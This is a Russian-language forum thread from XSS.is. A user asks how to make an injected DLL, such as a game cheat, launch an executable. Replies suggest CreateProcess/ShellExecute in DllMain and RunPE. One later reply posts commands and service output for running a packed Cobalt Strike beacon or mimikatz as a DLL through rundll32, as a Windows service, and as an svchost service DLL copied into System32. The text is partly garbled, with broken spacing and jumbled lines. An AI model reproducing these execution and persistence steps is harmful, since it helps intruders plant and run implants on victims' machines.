В общем хочу понять как сделать чтобы при инжектировании dll допустим тот же чит на кс происходил запуск exe буду благодарен если поможете
-
XSS.stack #1 – первый литературный журнал от юзеров форума
Метод запуска exe при инжектировании dll
- Автор темы РКН
- Дата начала
Уточни пожалуйста, кто должен запускать .exe, инжектированный процесс при инжекте в него длл или сама длл? Из описания не понятно.
это скорее не инжектирование а dll лоадер ))
либо RunPE это запуск exe через инжект в легитимный процесс
либо RunPE это запуск exe через инжект в легитимный процесс
- Автор темы
- Добавить закладку
- #4
сама длл
Ну тогда просто CreateProcess/ShellExecute на DLL_PROCESS_ATTACH добавить и все
Create DLL from beacon.exe or mimikatz.exe and inject it via tasklist; or register functions;
service-exe injection;
DLL injection;
service-DLL
NOTE: make sure about the command space;
service-exe injection;
Код:
C:> rundll32. \ Beacon.exe.packed.dll, DllMainDLL injection;
Код:
sc create beacon.r1z binpath = C: \ Users \ Public \ beacon.exe.packed.service.exe
C: \ Users \ Public> sc start beacon.r1z
SERVICE_NAME: beacon.r1z
TYPE: 20 WIN32_OWN_PROCESS
STATE: 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
WIN32_EXIT_CODE: 0 (0x0)
SERVICE_EXIT_CODE: 0 (0x0)
CHECKPOINT: 0x0
WAIT_HINT: 0x0
PID: 913
FLAGS: 0x0service-DLL
Код:
copy / y beacon.packed.exe.service.dll% SystemRoot% \ System32 \ SvcHostDemo.dll
etc command injection ../NOTE: make sure about the command space;
Последнее редактирование: